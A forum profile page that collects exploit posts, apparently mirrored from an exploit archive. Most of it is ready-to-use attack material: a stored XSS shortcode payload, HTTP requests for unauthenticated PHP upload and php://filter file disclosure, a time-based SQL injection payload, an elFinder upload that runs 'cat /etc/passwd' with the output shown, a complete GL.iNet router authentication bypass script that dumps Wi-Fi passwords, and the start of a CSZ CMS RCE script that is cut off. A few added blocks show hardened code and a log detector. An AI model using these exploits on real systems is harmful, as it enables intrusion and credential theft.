
Everything posted by HireHackking
-
Neontext Wordpress Plugin - Stored XSS
# Exploit Title: Wordpress Plugin Neon Text <= 1.1 - Stored Cross Site Scripting (XSS)
# Date: 2023-11-15
# Exploit Author: Eren Car
# Vendor Homepage: https://www.eralion.com/
# Software Link: https://downloads.wordpress.org/plugin/neon-text.zip
# Category: Web Application
# Version: 1.0
# Tested on: Debian / WordPress 6.4.1
# CVE : CVE-2023-5817

# 1. Description:
The Neon text plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's neontext_box shortcode in 1.1 and above versions.

# 2. Proof of Concept (PoC):
a. Install and activate version 1.0 of the plugin.
b. Go to the posts page and create a new post.
c. Add a shortcode block and insert the following payload:

[neontext_box][neontext color='"onmouseover="alert(document.domain)"']TEST[/neontext][/neontext_box]

d. Save the changes and preview the page. A popup window demonstrating the vulnerability will be executed.
-
Lot Reservation Management System - Unauthenticated File Upload and Remote Code Execution
# Exploit Title: Lot Reservation Management System Unauthenticated File Upload and Remote Code Execution
# Google Dork: N/A
# Date: 10th December 2023
# Exploit Author: Elijah Mandila Syoyi
# Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip
# Version: 1.0
# Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0
# CVE : N/A

Developer description about application purpose:-
------------------------------------------------------------------------------------------------------------------------------------------------------------------
About
The Lot Reservation Management System is a simple PHP/MySQLi project that will help a certain subdivision, condo, or any business that selling a land property or house and lot. The system will help the said industry or company to provide their possible client information about the property they are selling and at the same time, possible clients can reserve their desired property. The lot reservation system website for the clients has user-friendly functions and the contents that are displayed can be managed dynamically by the management. This system allows management to upload the area map, and by this feature, the system admin or staff will populate the list of lots, house models, or the property that they are selling to allow the possible client to choose the area they want. The map will be divided into each division of the property of building like Phase 1-5 of a certain Subdivision, each of these phases will be encoded individually in the system along with the map image showing the division of each property or lots.
------------------------------------------------------------------------------------------------------------------------------------------------------------------

Vulnerability:-
The application does not properly verify authentication information and file types before file upload. This can allow an attacker to bypass authentication and file checking and upload a malicious file to the server. There is an open directory listing where uploaded files are stored, allowing an attacker to open the malicious PHP file, which will then be executed by the server.

Proof of Concept:- (HTTP POST Request)

POST /lot/admin/ajax.php?action=save_division HTTP/1.1
Host: 192.168.150.228
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------217984066236596965684247013027
Content-Length: 606
Origin: http://192.168.150.228
Connection: close
Referer: http://192.168.150.228/lot/admin/index.php?page=divisions

-----------------------------217984066236596965684247013027
Content-Disposition: form-data; name="id"


-----------------------------217984066236596965684247013027
Content-Disposition: form-data; name="name"

sample
-----------------------------217984066236596965684247013027
Content-Disposition: form-data; name="description"

sample
-----------------------------217984066236596965684247013027
Content-Disposition: form-data; name="img"; filename="phpinfo.php"
Content-Type: application/x-php

<?php phpinfo() ?>
-----------------------------217984066236596965684247013027--

Check your uploaded file/shell in "http://192.168.150.228/lot/admin/assets/uploads/maps/". Replace the IP addresses with the victim IP address.
-
GLiNet - Router Authentication Bypass
DZONERZY Security Research
GLiNet: Router Authentication Bypass

========================================================================
Contents
========================================================================

1. Overview
2. Detailed Description
3. Exploit
4. Timeline

========================================================================
1. Overview
========================================================================

CVE-2023-46453 is a remote authentication bypass vulnerability in the web interface of GLiNet routers running firmware versions 4.x and up. The vulnerability allows an attacker to bypass authentication and gain access to the router's web interface.

========================================================================
2. Detailed Description
========================================================================

The vulnerability is caused by a lack of proper authentication checks in the /usr/sbin/gl-ngx-session file. The file is responsible for authenticating users to the web interface. The authentication is in different stages.

Stage 1: During the first stage the user sends a request to the challenge rpc endpoint. The endpoint returns a random nonce value used later in the authentication process.

Stage 2: During the second stage the user sends a request to the login rpc endpoint with the username and the encrypted password. The encrypted password is calculated by the following formula:

    md5(username + crypt(password) + nonce)

The crypt function is the standard unix crypt function.

The vulnerability lies in the fact that the username is not sanitized properly before being passed to the login_test function in the lua script.

------------------------------------------------------------------------
local function login_test(username, hash)
    if not username or username == "" then
        return false
    end

    for l in io.lines("/etc/shadow") do
        local pw = l:match('^' .. username .. ':([^:]+)')
        if pw then
            for nonce in pairs(nonces) do
                if utils.md5(table.concat({username, pw, nonce}, ":")) == hash then
                    nonces[nonce] = nil
                    nonce_cnt = nonce_cnt - 1
                    return true
                end
            end
            return false
        end
    end

    return false
end
------------------------------------------------------------------------

This script checks the username against the /etc/shadow file. If the username is found in the file the script will extract the password hash and compare it to the hash sent by the user. If the hashes match the user is authenticated.

The issue is that the username is not sanitized properly before being concatenated with the regex. This allows an attacker to inject a regex into the username field and modify the final behavior of the regex. For instance, the following username will match the userid of the root user:

    root:[^:]+:[^:]+

will become

    root:[^:]+:[^:]+:([^:]+)

This will match the "root:" string and then any character until the next ":" character. This will cause the script to skip the password and return the user id instead. Since the user id of the root user is always 0, the script will always return:

    md5("root:[^:]+:[^:]+" + "0" + nonce)

Since this value is always the same, the attacker can simply send the known hash value to the login rpc endpoint and gain access to the web interface.

Anyway, this approach won't work as expected, since later in the code, inside this check, the following appears:

------------------------------------------------------------------------
local aclgroup = db.get_acl_by_username(username)
local sid = utils.generate_id(32)
sessions[sid] = {
    username = username,
    aclgroup = aclgroup,
    timeout = time_now() + session_timeout
}
------------------------------------------------------------------------

The username, which is now our custom regex, will be passed to the get_acl_by_username function. This function will check the username against a database and return the aclgroup associated with the username.
If the username is not found in the database the function will return nil, thus causing the attack to fail.

By checking the code we can see that the get_acl_by_username function is actually appending our raw string to a query and then executing it. This means that we can inject a sql query into the username field and make it return a valid aclgroup.

------------------------------------------------------------------------
M.get_acl_by_username = function(username)
    if username == "root" then
        return "root"
    end

    local db = sqlite3.open(DB)
    local sql = string.format("SELECT acl FROM account WHERE username = '%s'", username)
    local aclgroup = ""
    for a in db:rows(sql) do
        aclgroup = a[1]
    end
    db:close()

    return aclgroup
end
------------------------------------------------------------------------

Using this payload we were able to craft a username which is both a valid regex and a valid sql query:

    roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+

this will make the sql query become:

    SELECT acl FROM account WHERE username = 'roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+'

which will return the aclgroup of the root user (root).

========================================================================
3. Exploit
========================================================================

------------------------------------------------------------------------
# Exploit Title: [CVE-2023-46453] GL.iNet - Authentication Bypass
# Date: 18/10/2023
# Exploit Author: Daniele 'dzonerzy' Linguaglossa
# Vendor Homepage: https://www.gl-inet.com/
# Vulnerable Devices:
#   GL.iNet GL-MT3000 (4.3.7)
#   GL.iNet GL-AR300M (4.3.7)
#   GL.iNet GL-B1300 (4.3.7)
#   GL.iNet GL-AX1800 (4.3.7)
#   GL.iNet GL-AR750S (4.3.7)
#   GL.iNet GL-MT2500 (4.3.7)
#   GL.iNet GL-AXT1800 (4.3.7)
#   GL.iNet GL-X3000 (4.3.7)
#   GL.iNet GL-SFT1200 (4.3.7)
#   And many more...
# Version: 4.3.7
# Firmware Release Date: 2023/09/13
# CVE: CVE-2023-46453

from urllib.parse import urlparse
import requests
import hashlib
import random
import sys


def exploit(url):
    try:
        requests.packages.urllib3.disable_warnings()
        host = urlparse(url)
        url = f"{host.scheme}://{host.netloc}/rpc"
        print(f"[*] Target: {url}")
        print("[*] Retrieving nonce...")
        nonce = requests.post(url, verify=False, json={
            "jsonrpc": "2.0",
            "id": random.randint(1000, 9999),
            "method": "challenge",
            "params": {"username": "root"}
        }, timeout=5).json()
        if "result" in nonce and "nonce" in nonce["result"]:
            print(f"[*] Got nonce: {nonce['result']['nonce']} !")
        else:
            print("[!] Nonce not found, exiting... :(")
            sys.exit(1)
        print("[*] Retrieving authentication token for root...")
        md5_hash = hashlib.md5()
        md5_hash.update(
            f"roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+:0:{nonce['result']['nonce']}".encode())
        password = md5_hash.hexdigest()
        token = requests.post(url, verify=False, json={
            "jsonrpc": "2.0",
            "id": random.randint(1000, 9999),
            "method": "login",
            "params": {
                "username": f"roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+",
                "hash": password
            }
        }, timeout=5).json()
        if "result" in token and "sid" in token["result"]:
            print(f"[*] Got token: {token['result']['sid']} !")
        else:
            print("[!] Token not found, exiting... :(")
            sys.exit(1)
        print("[*] Checking if we are root...")
        check = requests.post(url, verify=False, json={
            "jsonrpc": "2.0",
            "id": random.randint(1000, 9999),
            "method": "call",
            "params": [token["result"]["sid"], "system", "get_status", {}]
        }, timeout=5).json()
        if "result" in check and "wifi" in check["result"]:
            print("[*] We are authenticated as root! :)")
            print("[*] Below some info:")
            for wifi in check["result"]["wifi"]:
                print(f"[*] --------------------")
                print(f"[*] SSID: {wifi['ssid']}")
                print(f"[*] Password: {wifi['passwd']}")
                print(f"[*] Band: {wifi['band']}")
                print(f"[*] --------------------")
        else:
            print("[!] Something went wrong, exiting... :(")
            sys.exit(1)
    except requests.exceptions.Timeout:
        print("[!] Timeout error, exiting... :(")
        sys.exit(1)
    except KeyboardInterrupt:
        # The original printed an undefined variable here; report the interrupt instead.
        print("[!] Interrupted, exiting... :(")
        sys.exit(1)


if __name__ == "__main__":
    print("GL.iNet Auth Bypass\n")
    if len(sys.argv) < 2:
        # sys.argv[0] is the script name; the original indexed argv[1], which does not exist here.
        print(
            f"Usage: python3 {sys.argv[0]} https://target.com", file=sys.stderr)
        sys.exit(0)
    else:
        exploit(sys.argv[1])
------------------------------------------------------------------------

========================================================================
4. Timeline
========================================================================

2023/09/13 - Vulnerability discovered
2023/09/14 - CVE-2023-46453 requested
2023/09/20 - Vendor contacted
2023/09/20 - Vendor replied
2023/09/30 - CVE-2023-46453 assigned
2023/11/08 - Vulnerability patched and fix released
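Added example, not part of the advisory above: a Python port of the two vulnerable functions (the pattern match in login_test and the formatted SQL in get_acl_by_username) next to hardened versions, run against constructed shadow-style lines and an in-memory SQLite account table. Python's re stands in for Lua patterns; the hashes, the nonce and the table rows are made up.

```python
import hashlib
import re
import sqlite3

# Constructed /etc/shadow-style lines (fake hashes) standing in for the file
# that the router's gl-ngx-session script reads.
SHADOW_LINES = [
    "root:$1$fakehash$abcdefghijklmnopqrstu:19600:0:99999:7:::",
    "guest:$1$otherhash$vwxyzabcdefghijklmnop:19600:0:99999:7:::",
]
NONCE = "d41d8cd98f00b204"  # constructed sample nonce


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def vulnerable_match(username, line):
    """Port of l:match('^' .. username .. ':([^:]+)') from the advisory:
    the username is spliced into the pattern unescaped."""
    m = re.match("^" + username + ":([^:]+)", line)
    return m.group(1) if m else None


def hardened_match(username, line):
    """Same lookup without pattern injection: reject anything that is not a
    plain account name, then compare the first field literally."""
    if not re.fullmatch(r"[a-z_][a-z0-9_-]{0,31}", username):
        return None
    fields = line.split(":")
    return fields[1] if fields[0] == username else None


def login_test(username, client_hash, matcher):
    """Port of the advisory's login_test(): accept if the client hash equals
    md5(username:pw:nonce), where pw is whatever the matcher captured."""
    for line in SHADOW_LINES:
        pw = matcher(username, line)
        if pw is not None:
            return md5_hex(":".join([username, pw, NONCE])) == client_hash
    return False


def make_db():
    """In-memory stand-in for the router's account table (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE account (username TEXT, acl TEXT)")
    conn.execute("INSERT INTO account VALUES ('guest', 'guest')")
    return conn


def get_acl_vulnerable(conn, username):
    """Port of get_acl_by_username(): the username is formatted into the SQL."""
    sql = "SELECT acl FROM account WHERE username = '%s'" % username
    aclgroup = ""
    for row in conn.execute(sql):
        aclgroup = row[0]
    return aclgroup


def get_acl_hardened(conn, username):
    """Same query with a bound parameter: the username is data, not SQL."""
    aclgroup = ""
    for row in conn.execute("SELECT acl FROM account WHERE username = ?", (username,)):
        aclgroup = row[0]
    return aclgroup


def demo():
    # The advisory's username: as a pattern it skips the hash field and captures
    # the fourth shadow field ('0' in the constructed line); as SQL it makes the
    # ACL query return 'root'. The hash is therefore predictable without the password.
    injected = "roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+"
    predictable_hash = md5_hex(":".join([injected, "0", NONCE]))
    legit_hash = md5_hex(":".join(["root", SHADOW_LINES[0].split(":")[1], NONCE]))
    conn = make_db()
    return {
        "captured_field": vulnerable_match(injected, SHADOW_LINES[0]),
        "vuln_login": login_test(injected, predictable_hash, vulnerable_match),
        "vuln_acl": get_acl_vulnerable(conn, injected),
        "hard_login": login_test(injected, predictable_hash, hardened_match),
        "hard_acl": get_acl_hardened(conn, injected),
        "hard_login_root": login_test("root", legit_hash, hardened_match),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:16} {v!r}")
```

The hardened pair keeps the legitimate root login working while the injected username is rejected before it reaches either the pattern or the query.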
-
CVE-2023-50071 - Multiple SQL Injection
# Exploit Title: Customer Support System 1.0 - Multiple SQL injection vulnerabilities
# Date: 15/12/2023
# Exploit Author: Geraldo Alcantara
# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Windows
# CVE : CVE-2023-50071

*Description*: Multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_ticket in Customer Support System 1.0 allow authenticated attackers to execute arbitrary SQL commands via department_id, customer_id and subject.

*Payload*: '+(select*from(select(sleep(20)))a)+'

*Steps to reproduce*:
1- Log in to the application.
2- Navigate to the page /customer_support/index.php?page=new_ticket.
3- Create a new ticket and insert a malicious payload into one of the following parameters: department_id, customer_id, or subject.

*Request:*

POST /customer_support/ajax.php?action=save_ticket HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------81419250823331111993422505835
Content-Length: 853
Origin: http://192.168.68.148
Connection: close
Referer: http://192.168.68.148/customer_support/index.php?page=new_ticket
Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko; sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq; PHPSESSID=mfd30tu0h0s43s7kdjb74fcu0l

-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="id"


-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="subject"

teste'+(select*from(select(sleep(5)))a)+'
-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="customer_id"

3
-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="department_id"

4
-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="description"

<p>Blahs<br></p>
-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


-----------------------------81419250823331111993422505835--
-
Lot Reservation Management System - Unauthenticated File Disclosure
# Exploit Title: Lot Reservation Management System Unauthenticated File Disclosure Vulnerability
# Google Dork: N/A
# Date: 10th December 2023
# Exploit Author: Elijah Mandila Syoyi
# Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip
# Version: 1.0
# Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0
# CVE : N/A

Developer description about application purpose:-
------------------------------------------------------------------------------------------------------------------------------------------------------------------
About
The Lot Reservation Management System is a simple PHP/MySQLi project that will help a certain subdivision, condo, or any business that selling a land property or house and lot. The system will help the said industry or company to provide their possible client information about the property they are selling and at the same time, possible clients can reserve their desired property. The lot reservation system website for the clients has user-friendly functions and the contents that are displayed can be managed dynamically by the management. This system allows management to upload the area map, and by this feature, the system admin or staff will populate the list of lots, house models, or the property that they are selling to allow the possible client to choose the area they want. The map will be divided into each division of the property of building like Phase 1-5 of a certain Subdivision, each of these phases will be encoded individually in the system along with the map image showing the division of each property or lots.
------------------------------------------------------------------------------------------------------------------------------------------------------------------

Vulnerability:-
The application is vulnerable to a PHP source code disclosure vulnerability. This can be abused by an attacker to disclose sensitive PHP files within the application and also outside the server root. The PHP convert-to-base64 filter will be used in this scenario.

Proof of Concept:- (HTTP POST Request)

GET /lot/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1
Host: 192.168.150.228
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.150.228/lot/
Cookie: PHPSESSID=o59sqrufi4171o8bkbmf1aq9sn
Upgrade-Insecure-Requests: 1

The same can be achieved by removing the PHPSESSID cookie as below:-

GET /lot/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1
Host: 192.168.150.228
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.150.228/lot/
Upgrade-Insecure-Requests: 1

The requested file will be returned in base64 format in the returned HTTP response. The attack can also be used to traverse directories to return files outside the web root.

GET /lot/index.php?page=php://filter/convert.base64-encode/resource=D:\test HTTP/1.1
Host: 192.168.150.228
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.150.228/lot/
Upgrade-Insecure-Requests: 1

This will return the test.php file in the D:\ directory.
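Added example, not from either of the Lot Reservation posts: a small access-log scanner that flags the two request shapes the unauthenticated upload PoC and the file disclosure PoC leave behind, a PHP stream wrapper in the page parameter and a script fetched from the uploads directory. The log lines, timestamps and client IPs are constructed; the paths follow the PoCs.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed Apache combined-style access log lines modelled on the two PoCs
# (a php://filter read of admin/db_connect and a .php dropped into the maps dir).
SAMPLE_LOG = """\
192.168.150.10 - - [10/Dec/2023:10:01:02 +0000] "GET /lot/index.php?page=home HTTP/1.1" 200 5120
192.168.150.10 - - [10/Dec/2023:10:01:09 +0000] "GET /lot/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1" 200 912
192.168.150.10 - - [10/Dec/2023:10:02:31 +0000] "POST /lot/admin/ajax.php?action=save_division HTTP/1.1" 200 1
192.168.150.10 - - [10/Dec/2023:10:02:40 +0000] "GET /lot/admin/assets/uploads/maps/phpinfo.php HTTP/1.1" 200 74211
192.168.150.11 - - [10/Dec/2023:10:03:00 +0000] "GET /lot/admin/assets/uploads/maps/phase1.png HTTP/1.1" 200 34812
192.168.150.12 - - [10/Dec/2023:10:04:00 +0000] "GET /lot/index.php?page=php%3A%2F%2Ffilter%2Fresource%3Dindex HTTP/1.1" 200 640
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
# PHP stream wrappers that have no business appearing in an include-style parameter.
WRAPPER_RE = re.compile(r'\b(php|phar|data|expect|zip|glob)://', re.IGNORECASE)
# Directory the application writes uploads to (from the PoC) and extensions PHP would execute.
UPLOAD_DIR = "/lot/admin/assets/uploads/"
SCRIPT_EXT = (".php", ".phtml", ".php3", ".php5", ".phar")


def parse_line(line):
    """Split one combined-format log line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return the rule names an access-log entry trips (possibly none)."""
    hits = []
    parts = urlsplit(entry["target"])
    # Decode once: a percent-encoded wrapper dodges a naive substring match.
    query = unquote(parts.query)
    if WRAPPER_RE.search(query):
        hits.append("stream_wrapper_in_query")
    if parts.path.startswith(UPLOAD_DIR) and parts.path.lower().endswith(SCRIPT_EXT):
        hits.append("script_served_from_upload_dir")
    return hits


def scan(log_text):
    """Run every parsable line through the rules; returns (ip, rule, target) triples."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if not entry:
            continue
        for rule in classify(entry):
            findings.append((entry["ip"], rule, entry["target"]))
    return findings


if __name__ == "__main__":
    for ip, rule, target in scan(SAMPLE_LOG):
        print(f"{ip}  {rule:30} {target}")
```

A 200 on a .php under the uploads directory is the post-exploitation signal; the upload POST itself looks like normal admin traffic in the log, so the server-side fix (session check plus an allowlist on the img extension) is what stops it.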
-
elFinder Web file manager Version - 2.1.53 Remote Command Execution
# Exploit Title: elFinder Web file manager Version: 2.1.53 Remote Command Execution
# Date: 23/11/2023
# Exploit Author: tmrswrr
# Google Dork: intitle:"elFinder 2.1.53"
# Vendor Homepage: https://studio-42.github.io/elFinder/
# Software Link: https://github.com/Studio-42/elFinder/archive/refs/tags/2.1.53.zip
# Version: 2.1.53
# Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS

1 ) Enter the admin panel and go to this url > https://demos1.softaculous.com/CSZ_CMSstym1wtmnz/admin/filemanager

2 ) Click Template Main and upload this test.php file:

<?php echo system('cat /etc/passwd'); ?>

3 ) https://demos1.softaculous.com/CSZ_CMSstym1wtmnz/test.php

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:998:997:User for polkitd:/:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:997:995::/var/lib/chrony:/sbin/nologin
soft:x:1000:1000::/home/soft:/sbin/nologin
saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
emps:x:995:1001::/home/emps:/bin/bash
named:x:25:25:Named:/var/named:/sbin/nologin
exim:x:93:93::/var/spool/exim:/sbin/nologin
vmail:x:5000:5000::/var/local/vmail:/bin/bash
webuzo:x:992:991::/home/webuzo:/bin/bash
apache:x:991:990::/home/apache:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false
-
CSZ CMS Version 1.3.0 - Authenticated Remote Command Execution
# Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution
# Date: 17/11/2023
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download
# Version: Version 1.3.0
# Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS

import os
import zipfile
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.firefox.options import Options as FirefoxOptions
from selenium.webdriver.firefox.service import Service as FirefoxService
from webdriver_manager.firefox import GeckoDriverManager
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import NoSuchElementException, TimeoutException
import requests
from time import sleep
import sys
import random
import time
import platform
import tarfile
from io import BytesIO

email = "admin@admin.com"
password = "password"


class colors:
    OKBLUE = '\033[94m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
    CBLACK = '\33[30m'
    CRED = '\33[31m'
    CGREEN = '\33[32m'
    CYELLOW = '\33[33m'
    CBLUE = '\33[34m'
    CVIOLET = '\33[35m'
    CBEIGE = '\33[36m'
    CWHITE = '\33[37m'


color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE,
                colors.CGREEN, colors.WARNING, colors.CRED, colors.CBEIGE]
random.shuffle(color_random)


def entryy():
    # Animated banner, printed one character at a time.
    x = color_random[0] + """
 ╭━━━┳━━━┳━━━━╮╭━━━┳━╮╭━┳━━━╮╭━━━┳━━━┳━━━╮╭━━━┳━╮╭━┳━━━┳╮╱╱╭━━━┳━━┳━━━━╮
 ┃╭━╮┃╭━╮┣━━╮━┃┃╭━╮┃┃╰╯┃┃╭━╮┃┃╭━╮┃╭━╮┃╭━━╯┃╭━━┻╮╰╯╭┫╭━╮┃┃╱╱┃╭━╮┣┫┣┫╭╮╭╮┃
 ┃┃╱╰┫╰━━╮╱╭╯╭╯┃┃╱╰┫╭╮╭╮┃╰━━╮┃╰━╯┃┃╱╰┫╰━━╮┃╰━━╮╰╮╭╯┃╰━╯┃┃╱╱┃┃╱┃┃┃┃╰╯┃┃╰╯
 ┃┃╱╭╋━━╮┃╭╯╭╯╱┃┃╱╭┫┃┃┃┃┣━━╮┃┃╭╮╭┫┃╱╭┫╭━━╯┃╭━━╯╭╯╰╮┃╭━━┫┃╱╭┫┃╱┃┃┃┃╱╱┃┃
 ┃╰━╯┃╰━╯┣╯━╰━╮┃╰━╯┃┃┃┃┃┃╰━╯┃┃┃┃╰┫╰━╯┃╰━━╮┃╰━━┳╯╭╮╰┫┃╱╱┃╰━╯┃╰━╯┣┫┣╮╱┃┃
 ╰━━━┻━━━┻━━━━╯╰━━━┻╯╰╯╰┻━━━╯╰╯╰━┻━━━┻━━━╯╰━━━┻━╯╰━┻╯╱╱╰━━━┻━━━┻━━╯╱╰╯

                     << CSZ CMS Version 1.3.0 RCE >>
                          << CODED BY TMRSWRR >>
                         << GITHUB==>capture0x >>
\n"""
    for c in x:
        print(c, end='')
        sys.stdout.flush()
        sleep(0.0045)
    oo = " " * 6 + 29 * "░⣿" + "\n\n"
    for c in oo:
        print(colors.CGREEN + c, end='')
        sys.stdout.flush()
        sleep(0.0065)
    tt = " " * 5 + "░⣿" + " " * 6 + "WELCOME TO CSZ CMS Version 1.3.0 RCE Exploit" + " " * 7 + "░⣿" + "\n\n"
    for c in tt:
        print(colors.CWHITE + c, end='')
        sys.stdout.flush()
        sleep(0.0065)
    xx = " " * 6 + 29 * "░⣿" + "\n\n"
    for c in xx:
        print(colors.CGREEN + c, end='')
        sys.stdout.flush()
        sleep(0.0065)


def check_geckodriver():
    # The script drives Firefox through Selenium and expects geckodriver next to itself.
    current_directory = os.path.dirname(os.path.abspath(__file__))
    geckodriver_path = os.path.join(current_directory, 'geckodriver')
    if not os.path.isfile(geckodriver_path):
        red = "\033[91m"
        reset = "\033[0m"
        print(red + "\n\nGeckoDriver (geckodriver) is not available in the script's directory." + reset)
        user_input = input("Would you like to download it now? (yes/no): ").lower()
        if user_input == 'yes':
            download_geckodriver(current_directory)
        else:
            print(red + "Please download GeckoDriver manually from: https://github.com/mozilla/geckodriver/releases" + reset)
            sys.exit(1)


def download_geckodriver(directory):
    print("[*] Detecting OS and architecture...")
    os_name = platform.system().lower()
    arch, _ = platform.architecture()
    if os_name == "linux":
        os_name = "linux"
        arch = "64" if arch == "64bit" else "32"
    elif os_name == "darwin":
        os_name = "macos"
        arch = "aarch64" if platform.processor() == "arm" else ""
    elif os_name == "windows":
        os_name = "win"
        arch = "64" if arch == "64bit" else "32"
    else:
        print("[!] Unsupported operating system.")
        sys.exit(1)
    geckodriver_version = "v0.33.0"
    geckodriver_file = f"geckodriver-{geckodriver_version}-{os_name}{arch}"
    ext = "zip" if os_name == "win" else "tar.gz"
    url = f"https://github.com/mozilla/geckodriver/releases/download/{geckodriver_version}/{geckodriver_file}.{ext}"
    print(f"[*] Downloading GeckoDriver for {platform.system()} {arch}-bit...")
    response = requests.get(url, stream=True)
    if response.status_code == 200:
        print("[*] Extracting GeckoDriver...")
        if ext == "tar.gz":
            with tarfile.open(fileobj=BytesIO(response.content), mode="r:gz") as tar:
                tar.extractall(path=directory)
        else:
            with zipfile.ZipFile(BytesIO(response.content)) as zip_ref:
                zip_ref.extractall(directory)
        print("[+] GeckoDriver downloaded and extracted successfully.")
    else:
        print("[!] Failed to download GeckoDriver.")
        sys.exit(1)


def create_zip_file(php_filename, zip_filename, php_code):
    # The upgrade page accepts a zip archive; wrap the PHP file in one.
    try:
        with open(php_filename, 'w') as file:
            file.write(php_code)
        with zipfile.ZipFile(zip_filename, 'w') as zipf:
            zipf.write(php_filename)
        print("[+] Zip file created successfully.")
        os.remove(php_filename)
